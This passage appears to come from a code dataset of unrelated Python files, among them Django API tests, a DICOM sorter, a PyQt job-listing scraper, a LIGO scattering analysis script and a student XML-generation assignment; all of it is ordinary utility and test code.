"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(201, response.status_code)
self.assertEqual(
self.vnf_subscription_data["callbackUri"],
response.data["callbackUri"]
)
self.assertEqual(temp_uuid, response.data["id"])
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_duplicate_subscriptions(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
temp1_uuid = "00342b18-a5c7-11e8-998c-bf1755941f12"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.side_effect = [temp_uuid, temp1_uuid]
response = self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(201, response.status_code)
self.assertEqual(
self.vnf_subscription_data["callbackUri"],
response.data["callbackUri"]
)
self.assertEqual(temp_uuid, response.data["id"])
temp_uuid = "00442b18-a5c7-11e8-998c-bf1755941f12"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
response = self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.assertEqual(303, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscriptions(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions?usageState=IN_USE",
format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(1, len(response.data))
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscriptions_with_invalid_params(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions?dummy=dummy",
format='json'
)
self.assertEqual(400, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscription_with_id(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % temp_uuid,
format='json'
)
self.assertEqual(200, response.status_code)
self.assertEqual(temp_uuid, response.data["id"])
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_get_subscription_with_id_not_exists(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
dummy_uuid = str(uuid.uuid4())
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
response = self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid,
format='json'
)
self.assertEqual(404, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_delete_subscription_with_id(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
dummy_uuid = str(uuid.uuid4())
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
self.client.post(
"/api/vnfpkgm/v1/subscriptions",
data=self.vnf_subscription_data,
format='json'
)
self.client.get(
"/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid,
format='json'
)
response = self.client.delete("/api/vnfpkgm/v1/subscriptions/%s" % temp_uuid)
self.assertEqual(204, response.status_code)
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_delete_subscription_with_id_not_exists(self, mock_uuid4, mock_requests):
dummy_uuid = str(uuid.uuid4())
response = self.client.delete("/api/vnfpkgm/v1/subscriptions/%s" % dummy_uuid)
self.assertEqual(404, response.status_code)
|
from avatar import *
class Bike(Avatar):
def __init__(self):
self.name = "bike"
def action(self):
pass
|
import pandas as pd
import numpy as np
"""
Function which convert the label of subconcepts into core concepts labels
"""
def convert_sub_concepts_to_core(ontology, abstract_concepts_file):
# open files
concepts = pd.read_csv(abstract_concepts_file, sep=",", header=0).values
# create dictionnary of core concepts
core_concepts = set(concepts[:,1])
core_concepts = {k:i for i,k in enumerate(core_concepts)}
# create dictionnary of subconcept to coreconcept
sub_to_core = concepts[:,1]
for i in range(ontology.shape[0]):
ontology[i,1] = core_concepts[sub_to_core[ontology[i,1]]]
return ontology, core_concepts
|
import requests
import time
from datetime import datetime
import json, io, os
def writefileheaders(filename, json_data):
with io.open(filename, 'w', encoding='utf-8') as f:
for bolt in range(len(data["bolts"])):
f.write(unicode("boltId, emitted, executeLatency(s), processLatency(s), "))
for spout in range(len(data["spouts"])):
f.write(unicode("spoutId, completeLatency(s), "))
f.write(unicode("tasksTotal, completeLatency(s), uptime"))
f.write(unicode("\n"))
def dump2file(filename, json_data):
if not os.path.isfile(filename) or os.stat(filename).st_size == 0:
writefileheaders(filename, json_data)
with io.open(filename, 'a', encoding='utf-8') as f:
print data["topologyStats"]
# f.write(unicode(json.dumps(json_data, ensure_ascii=False)))
for bolt in range(len(data["bolts"])):
f.write(unicode(data["bolts"][bolt]["boltId"])+", ")
f.write(unicode(data["bolts"][bolt]["emitted"])+", ")
f.write(unicode(data["bolts"][bolt]["executeLatency"])+", ")
f.write(unicode(data["bolts"][bolt]["processLatency"])+", ")
for spout in range(len(data["spouts"])):
f.write(unicode(data["spouts"][spout]["spoutId"])+", ")
f.write(unicode(data["spouts"][spout]["completeLatency"])+", ")
f.write(unicode(data["tasksTotal"])+", ")
f.write(unicode(data["topologyStats"][0]["completeLatency"])+", ")
f.write(unicode(data["uptime"]))
f.write(unicode("\n"))
if __name__ == '__main__':
storm_topology_url = 'http://example.com:49467/api/v1/topology/trendingHashTags-15-1476271470'
experiment_name = "YARN-Default_1Node"
experiment_outfile = "./Storm_"+experiment_name+\
"-"+str(datetime.now())+".dat"
while True:
response = requests.get(storm_topology_url)
data = response.json()
print json.dumps(data, sort_keys=True, indent=4, separators=(',', ': '))
dump2file(experiment_outfile, data)
time.sleep(10)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys , argparse
import glob
import numpy as np
import pydicom
from shutil import copyfile, rmtree, move
def get_arguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="",
epilog="""
Sort DICOM Files
Input: Folder
""")
parser.add_argument(
"-d", "--idir",
required=True, nargs="+",
help="Folder to be sorted",
)
parser.add_argument(
"-r", "--rmRaw",
required=False, nargs="+",
help="Remove raw folder",
)
parser.add_argument(
"-k", "--keepName",
required=False, nargs="+",
help="Keep old name",
)
parser.add_argument(
"-o", "--odir",
required=True, nargs="+",
help="Output folder - if doesnt exist it will be created",
)
parser.add_argument(
"-v", "--verbose",
action='store_true',
help="Verbose to get more information about whats going on",
)
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
else:
return args
class sortDCM(object):
"""
"""
def __init__(
self, idir, odir, rmRaw=False, keepName=False,
verbose=False, log_level="INFO"):
self.inputFolder = idir[0]
if not os.path.exists(self.inputFolder):
print('Input dir does not exit: {}'.format(self.inputFolder))
sys.exit()
if not os.path.exists(odir[0]):
os.mkdir(odir[0])
self.outputFolder = odir[0]
self.keepName = keepName
self.verbose = verbose
self.rmRaw = rmRaw
def run(self):
onlyFiles = [os.path.join(path, name) for path, subdirs, files in os.walk(self.inputFolder) for name in files]
onlyFiles.sort()
meSeq = []
for nFile in onlyFiles:
if self.verbose:
print('File: '+nFile)
iFile = nFile
ds = pydicom.dcmread(iFile, force=True) # Read File
if 'SeriesNumber' in ds and 'SeriesDescription' in ds and 'PatientName' in ds and 'InstanceNumber' in ds:
seriesFolder = os.path.join(self.outputFolder, '{:02d}'.format(ds.SeriesNumber) + '-' + str(ds.SeriesDescription.replace(' ','_').replace('/','_')))
if not os.path.exists(seriesFolder): # Create Serie Directory
os.mkdir(seriesFolder)
if self.verbose:
print('Create new series of dicoms: {}'.format(seriesFolder))
if not self.keepName: # Change Name
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
else:
newName = os.path.join(seriesFolder, nFile)
if not os.path.exists(newName):
copyfile(iFile, newName)
if self.verbose:
print('Copy file {} to {}'.format(nFile, newName))
else:
print('ERROR: {} already exists with this new name {}'.format(iFile, newName))
if 'EchoNumbers' in ds:
meSeq.append(seriesFolder)
copyfile(iFile, newName.replace('.dcm','_' + str(ds.EchoNumbers) + '.dcm'))
meSeq = list(set(meSeq))
for nSeries in meSeq:
onlyFiles = [f for f in os.listdir(nSeries) if os.path.isfile(os.path.join(nSeries, f))]
for nFile in onlyFiles:
iFile = os.path.join(nSeries, nFile)
ds = pydicom.dcmread(iFile, force=True) # Read File
if 'EchoNumbers' in ds:
seriesFolder = os.path.join(nSeries, 'echo_' + str(ds.EchoNumbers))
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
move(iFile, newName)
else:
seriesFolder = os.path.join(nSeries, 'echo_others')
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, str(ds.PatientName) + '-' + '{:03d}'.format(ds.InstanceNumber) + '.dcm')
move(iFile, newName)
else:
seriesFolder = os.path.join(self.outputFolder, 'others')
if not os.path.exists(seriesFolder):
os.mkdir(seriesFolder)
newName = os.path.join(seriesFolder, os.path.basename(nFile))
copyfile(iFile, newName)
else:
print('File: {} is missing some keys'.format(nFile))
# Remove input Folder
if self.rmRaw:
rmtree(self.inputFolder)
if self.verbose:
print('Remove RAW folder: {}'.format(self.inputFolder))
def main():
"""Let's go"""
args = get_arguments()
app = sortDCM(**vars(args))
return app.run()
if __name__ == '__main__':
sys.exit(main())
|
# Generated by Django 2.2.3 on 2020-01-15 09:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("robbit", "0006_auto_20190718_1221")]
operations = [
migrations.AlterField(
model_name="tile", name="x", field=models.BigIntegerField(db_index=True)
),
migrations.AlterField(
model_name="tile", name="y", field=models.BigIntegerField(db_index=True)
),
]
|
def zebulansNightmare(arg):
return ''.join([x.capitalize() if c != 0 else x for c,x in enumerate(arg.split('_'))])
'''
Zebulan has worked hard to write all his python code in strict compliance to PEP8
rules. In this kata, you are a mischevious hacker that has set out to sabatoge all his good code.
Your job is to take PEP8 compatible function names and convert them to camelCase. For example:
zebulansNightmare('camel_case') == 'camelCase'
zebulansNightmare('zebulans_nightmare') == 'zebulansNightmare'
zebulansNightmare('get_string') == 'getString'
zebulansNightmare('convert_to_uppercase') == 'convertToUppercase'
zebulansNightmare('main') == 'main'
'''
|
from PyQt5 import QtCore,QtWidgets
from PyQt5.QtWidgets import QApplication, QWidget
import sys
import requests
from lxml import etree
import re
from concurrent.futures import ThreadPoolExecutor
import threading
import csv
import os
Tlock = threading.Lock()
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(832, 522)
self.gridLayout = QtWidgets.QGridLayout(Form)
self.gridLayout.setObjectName("gridLayout")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setObjectName("textBrowser")
self.gridLayout.addWidget(self.textBrowser, 1, 0, 1, 5)
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setObjectName("pushButton_2")
self.gridLayout.addWidget(self.pushButton_2, 3, 2, 1, 1)
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setObjectName("pushButton_3")
self.gridLayout.addWidget(self.pushButton_3, 4, 2, 1, 1)
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setObjectName("pushButton")
self.gridLayout.addWidget(self.pushButton, 3, 3, 1, 1)
self.pushButton_4 = QtWidgets.QPushButton(Form)
self.pushButton_4.setObjectName("pushButton_4")
self.gridLayout.addWidget(self.pushButton_4, 4, 3, 1, 1)
self.lineEdit = QtWidgets.QLineEdit(Form)
self.lineEdit.setObjectName("lineEdit")
self.gridLayout.addWidget(self.lineEdit, 3, 0, 1, 1)
self.pushButton_5 = QtWidgets.QPushButton(Form)
self.pushButton_5.setObjectName("pushButton_5")
self.gridLayout.addWidget(self.pushButton_5, 4, 0, 1, 1)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "luvm的招聘信息获取软件_彭迪"))
self.pushButton_2.setText(_translate("Form", "武汉理工就业网招聘会"))
self.pushButton_3.setText(_translate("Form", "华科就业网招聘信息"))
self.pushButton.setText(_translate("Form", "华科就业网招聘会"))
self.pushButton_4.setText(_translate("Form", "武汉理工就业网招聘信息"))
self.pushButton_5.setText(_translate("Form", "关键字搜索"))
class mwindow(QWidget, Ui_Form):
def __init__(self):
super(mwindow, self).__init__()
self.setupUi(self)
self.li = ['./whut_meeting.csv','./hust_meeting.csv','./whut_job.csv','./hust_job.csv']
for i in self.li:
if os.path.exists(i):
os.remove(i)
def csv_saver(self,name,cont):
with open(name, 'at', newline='', encoding='utf-8') as f:
writer = csv.writer(f)
writer.writerow(cont)
def whut_meeting(self):
self.textBrowser.setText('武汉理工就业网未来几天招聘会信息:')
self.textBrowser.append("-" * 60)
if os.path.exists('./whut_meeting.csv'):
with open('./whut_meeting.csv','rt',encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1,11):
executor.submit(self.whut_meeting_more, i)
executor.shutdown(wait=True)
def whut_meeting_more(self,i):
Tlock.acquire()
whut_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
res = requests.get('http://scc.whut.edu.cn/meetList.shtml?date=&searchForm=&pageNow={}'.format(i), headers=whut_headers)
html = res.content
parseHtml = etree.HTML(html)
conts = parseHtml.xpath('/html/body/div[3]/div[2]/ul/li')
for cont in conts:
name = cont.xpath('./a/text()')[0].strip()
place = cont.xpath('./span[2]/text()')[0].strip()
time_ = cont.xpath('./span[1]/text()')[0].strip()
url = 'http://scc.whut.edu.cn/' + cont.xpath('./a/@href')[0].strip()
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./whut_meeting.csv', [name,place,time_,url])
self.textBrowser.append('-' * 30)
self.textBrowser.append("-" * 60)
Tlock.release()
def hust_meeting(self):
self.textBrowser.setText('华科就业网未来几天招聘会信息:')
self.textBrowser.append("-" * 60)
if os.path.exists('./hust_meeting.csv'):
with open('./hust_meeting.csv','r',encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + place + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1,11):
executor.submit(self.hust_meeting_more, i)
executor.shutdown(wait=True)
def hust_meeting_more(self,i):
Tlock.acquire()
hust_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
res = requests.get('http://job.hust.edu.cn/searchJob_{}.jspx?type=0&fbsj=0'.format(i), headers=hust_headers)
html = res.text
names = re.findall('title="(.*?)"', html)
urls = re.findall('href="(.*?) title="', html)
time_s = re.findall('<span>(\d*-\d*-\d* \d*:\d* )</span>', html)
places = re.findall(r'<span>([\u4e00-\u9fa5]+[A-Z]*[\u4e00-\u9fa5]*[0-9]*[\u4e00-\u9fa5]*)</span>', html)[:-2]
for n, name in enumerate(names):
time_ = time_s[n]
place = places[n]
url = 'http://job.hust.edu.cn' + urls[n][:-1]
self.textBrowser.append(name + ' ' + time_ + ' ' + place)
self.textBrowser.append(url)
self.textBrowser.append('-' * 30)
self.csv_saver('./hust_meeting.csv', [name, place, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def whut_job(self):
self.textBrowser.setText('武汉理工就业网最近几天发布的招聘信息:')
self.textBrowser.append('-'*60)
if os.path.exists('./whut_job.csv'):
with open('./whut_job.csv','r',encoding='utf-8') as f:
for i in f.readlines():
name, time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1, 11):
executor.submit(self.whut_job_more, i)
executor.shutdown(wait=True)
def whut_job_more(self,i):
Tlock.acquire()
whut_headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'
}
url = 'http://scc.whut.edu.cn/infoList.shtml?tid=1001&searchForm=&pageNow={}'.format(i)
res = requests.get(url, headers=whut_headers)
html = res.content
parseHtml = etree.HTML(html)
conts = parseHtml.xpath('/html/body/div[3]/div[2]/ul/li')
for cont in conts:
name = cont.xpath('./a/text()')[0].strip()
time_ = cont.xpath('./span/text()')[0].strip()
url = 'http://scc.whut.edu.cn/' + cont.xpath('./a/@href')[0].strip()
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./whut_job.csv', [name, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def hust_job(self):
self.textBrowser.setText('华科就业网最近几天发布的招聘信息:')
self.textBrowser.append('-'*60)
if os.path.exists('./hust_job.csv'):
with open('./hust_job.csv','r',encoding='utf-8') as f:
for i in f.readlines():
try:
name,time_, url = i.strip().split(',')
self.textBrowser.append(name + ' ' + time_ )
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
except:
pass
else:
executor = ThreadPoolExecutor(max_workers=10)
for i in range(1, 11):
executor.submit(self.hust_job_more, i)
executor.shutdown(wait=True)
def hust_job_more(self,i):
Tlock.acquire()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"}
url1 = 'http://job.hust.edu.cn/searchJob_{}.jspx?type=2&fbsj='.format(i)
html = requests.get(url1, headers).text
names = re.findall('title="(.*?)"', html)
times = re.findall('<td width="120" valign="top">\[(.*?)\]</td>', html)
urls = re.findall('<a href="(.*?)" title=', html)
for n, name in enumerate(names):
time_ = times[n]
url = 'http://job.hust.edu.cn' + urls[n]
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.csv_saver('./hust_job.csv', [name, time_, url])
self.textBrowser.append('-' * 60)
Tlock.release()
def search(self):
keyword = self.lineEdit.text()
self.textBrowser.setText('针对关键字为“{}”搜索:'.format(keyword))
self.textBrowser.append('-'*60)
for file in self.li:
if os.path.exists(file) :
if 'meeting' in file:
with open(file, 'r', encoding='utf-8') as f:
for i in f.readlines():
name, place, time_, url = i.strip().split(',')
if keyword in name:
self.textBrowser.append(name + ' '+place+' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
else:
with open(file, 'r', encoding='utf-8') as f:
for j in f.readlines():
name, time_, url = j.strip().split(',')
if keyword in name:
self.textBrowser.append(name + ' ' + time_)
self.textBrowser.append(url)
self.textBrowser.append("-" * 60)
self.lineEdit.clear()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = mwindow()
w.pushButton.clicked.connect(w.hust_meeting)
w.pushButton_3.clicked.connect(w.hust_job)
w.pushButton_2.clicked.connect(w.whut_meeting)
w.pushButton_4.clicked.connect(w.whut_job)
w.pushButton_5.clicked.connect(w.search)
w.lineEdit.returnPressed.connect(w.search)
w.show()
sys.exit(app.exec_())
|
from common.run_method import RunMethod
import allure
@allure.step("极运营/系统设置/基础参数设置/线索来源/查询")
def dict_studentSource_query_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/系统设置/基础参数设置/线索来源/查询"
url = f"/service-crm/dict/studentSource/query"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/系统设置/基础参数设置/线索来源/新增")
def dict_studentSource_add_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/系统设置/基础参数设置/线索来源/新增"
url = f"/service-crm/dict/studentSource/add"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/系统设置/基础参数设置/线索来源/修改")
def dict_studentSource_edit_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/系统设置/基础参数设置/线索来源/修改"
url = f"/service-crm/dict/studentSource/edit"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/系统设置/基础参数设置/线索来源/编辑状态")
def dict_studentSource_updateStatus_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/系统设置/基础参数设置/线索来源/编辑状态"
url = f"/service-crm/dict/studentSource/updateStatus"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
@allure.step("极运营/通用/查询线索来源")
def dict_studentSource_queryNoAuth_post(params=None, body=None, header=None, return_json=True, **kwargs):
'''
:param: url地址后面的参数
:body: 请求体
:return_json: 是否返回json格式的响应(默认是)
:header: 请求的header
:host: 请求的环境
:return: 默认json格式的响应, return_json=False返回原始响应
'''
name = "极运营/通用/查询线索来源"
url = f"/service-crm/dict/studentSource/queryNoAuth"
res = RunMethod.run_request("POST", url, params=params, body=body, header=header, return_json=return_json, name=name, **kwargs)
return res
|
import numpy as np # importing the libraries
import os
from gwpy.table import EventTable
from gwpy.segments import DataQualityDict
from trigfind import find_trigger_files
from gwpy.segments import DataQualityFlag
from gwpy.time import tconvert
import datetime
from gwpy.time import to_gps
from gwpy.time import from_gps
import pandas as pd
from gwpy.segments import Segment
gpstime = raw_input("Enter the gpstime: ")
days = raw_input("Enter the number of days: ")
scattime = []
scatseg = []
l2 = []
l1 = []
for i in range(0,int(days),1):
l1.append(int(gpstime) +i*86400)
for m in l1:
starttime = m
endtime = m + 86400
date = tconvert(starttime).date().isoformat().replace('-','') # getting date from the starttime
try:
scatpath = '/home/detchar/public_html/scattering/day/'+str(date)+'/L1-SCATTERING_SEGMENTS_15_HZ-'+str(starttime)+'-'+'86400'+'.xml.gz' # address of the scattering file in cluster.
flags = DataQualityDict.read(scatpath)
flagsd = dict(flags)
#reading the active segments in a list.
[scatseg.append(i.active) for i in flagsd.values()]
# for j in range(len(scatseg)):
# scattime.append([scatseg[j][i][1] - scatseg[j][i][0] for i in range(len(scatseg[j]))])
# for i in range(len(scattime)):
# for k in scattime[i]:
# j = k.gpsSeconds + float(k.gpsNanoSeconds)/10**9
# l2.append(j)
except IOError:
print("There was no scattering observed for this day.")
print("Done Collected scat segs")
for j in range(len(scatseg)):
scattime.append([scatseg[j][i][1] - scatseg[j][i][0] for i in range(len(scatseg[j]))])
for i in range(len(scattime)):
for k in scattime[i]:
j = k.gpsSeconds + float(k.gpsNanoSeconds)/10**9
l2.append(j)
#print(scatseg)
#print(scattime)
#print(l2)
#print(len(l2))
#print(len(scatseg))
#print((scatseg,l2))
segs = []
for i in range(len(scatseg)):
for j in scatseg[i]:
segs.append(j)
# segs.append(((scatseg[i][j][0].gpsSeconds + float(scatseg[i][j][0].gpsNanoSeconds)/10**9),(scatseg[i][j][1].gpsSeconds+float(scatseg[i][j][1].gpsNanoSeconds)/10**9)))
#print(segs)
#print(len(segs))
#print(segs)
print(len(segs))
df = pd.DataFrame(list(zip(segs,l2)),columns = ["Scatsegs","ScatDur"])
#print(df)
#dfmerged.to_csv("totscatmerged.csv",index = False)
#pt = [1174363865.84,1174382177.97]
#for i in segs:
# for j in pt:
# if j in i:
# print((i,j))
segssor = sorted(segs,key = lambda x : x[0])
seg1 = list(segssor)
print("Done sorting segments.")
merge3 = []
k = 0
for i in seg1:
k +=1
m = 0
for j in seg1[k:]:
if i.intersects(j):
if i[0] == j[0]:
if i[1]<j[1]:
m+=1
i = Segment(i[0],j[1])
elif i[1]>j[1]:
m+=1
i = Segment(i[0],i[1])
elif i[0] != j[0]:
if i[1]<j[1]:
m+=1
i = Segment(i[0],j[1])
elif i[1]>j[1]:
m+=1
i = Segment(i[0],i[1])
elif i[1] == j[1]:
m+=1
i = Segment(i[0],i[1])
seg1.remove(j)
else:
merge3.append(i)
i = Segment(j[0],j[1])
seg1.pop(0)
merge3.append(seg1[0]) # This last seg is not read by the loop if does not intersect, so apending it here
print("Done merging segments")
dfmerge = pd.DataFrame(merge3,columns = ["Segstart","Segend"])
dfmerge["Dur"] = dfmerge["Segend"] - dfmerge["Segstart"]
#dfmerge.to_csv("mergesegs.csv", index = False)
print(len(dfmerge))
starttime1 = int(gpstime)
endtime1 = int(days)*86400 + starttime1
try:
cache = find_trigger_files('L1:GDS-CALIB_STRAIN','omicron', int(starttime1),int(endtime1))
t = EventTable.read(cache, format = 'ligolw', tablename = 'sngl_burst', columns = ['peak_time','peak_time_ns','peak_frequency','snr'])
t1 = t.filter('snr>10','peak_frequency<30.00') # Filtering the table by SNR and Peak frequency.
# adding peaktime and peaktime nanosecond for all the triggers.
pns=[]
[pns.append(float(i)/10**9) for i in t1["peak_time_ns"]]
PeakTime = np.add(t1["peak_time"],pns).tolist()
t1["PeakT"] = PeakTime
t1 = t1[["PeakT","snr","peak_frequency"]]
except (ValueError,ZeroDivisionError) as e:
print("The analysis did not run today.")
print("Done collecting triggers.")
print(len(t1))
#if cache:
# print(t1)
PeakTime1 = []
for i in PeakTime:
PeakTime1.append(i+10)
scattrig = []
trigscat = []
for i in merge3:
for j in PeakTime1:
if j in i:
trigscat.append(j)
scattrig.append(i)
print(len(trigscat))
#df = pd.DataFrame(list(zip(segs,l2)),columns = ["Scatsegs","ScatDur"])
df1 = pd.DataFrame(list(zip(scattrig,trigscat)), columns = ["Scatwithtrigs","TrigsinScat"])
df1.to_csv("trigsinscatmer10.csv", index = False)
#print("The total number of filtered triggers are {0}".format(len(t1)))
#print("The total number of scattring segments are {0}".format(len(segs)))
#print("The total number of triggers within scattering segments are {0}".format(len(trigscat)))
|
#!/usr/bin/env python3
#Suin Kim
#CS265-005
#Assignment 2
import sys
import os
import stat
import re
#checks arguments provided
def checkArg():
if (len(sys.argv) == 1): #if no argument provided, use current directory
return os.getcwd()
elif (len(sys.argv) == 2):
if (os.path.isdir(sys.argv[1])): #if valid directory provided as argument, use that
return os.path.abspath(sys.argv[1])
else:
print(sys.argv[1], "is not a valid directory.")
sys.exit()
else:
print("Too many arguments provided")
sys.exit()
#checks if item is a regular file(or, symlink), directory, a named pipe, or a socket
def checkType(directory, item):
try: #if item exists in directory, checks type
os.path.exists(os.path.join(directory, item))
mode = os.stat(os.path.join(directory, item)).st_mode
if stat.S_ISREG(mode):
return "file"
elif stat.S_ISDIR(mode):
return "dir"
elif stat.S_ISFIFO(mode):
return "fifo"
elif stat.S_ISSOCK(mode):
return "sock"
except: #if item does not exist in directory, assume it is a regular file
return "file"
#generates dir.xml in given directory
def dropXml(directory):
xml = open(os.path.join(directory, "dir.xml"), "w")
xml.write("<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<direntry>\n")
if (os.path.isfile(os.path.join(directory, "README"))): #if README file exists in directory
readme(directory, xml) #get index and/or required nodes
other(directory, xml) #get other node and items not listed in README
xml.write("</direntry>\n")
xml.close
#parses README file and adds index and/or required nodes to dir.xml
def readme(directory, xml):
readme = open(os.path.join(directory, "README"), "r")
readmeString = readme.read()
readme.close()
readmeItems = list(filter(None, re.split("[:\n]+", readmeString)))
if (readmeItems[0] == "index"): #if README has index entry
xml.write("\t<index>\n\t\t<file>" + readmeItems[1] + "</file>\n\t</index>\n") #index only contains one file
if (len(readmeItems) > 2): #if readmeItems has more than two elements, README has required entry
xml.write("\t<required>\n")
for i in range(3, len(readmeItems)): #items for required entry start at list index 3, checks type for each item
itemType = checkType(directory, readmeItems[i])
xml.write("\t\t<" + itemType + ">" + readmeItems[i] + "</" + itemType + ">\n")
xml.write("\t</required>\n")
else: #if README only has required entry
xml.write("\t<required>\n")
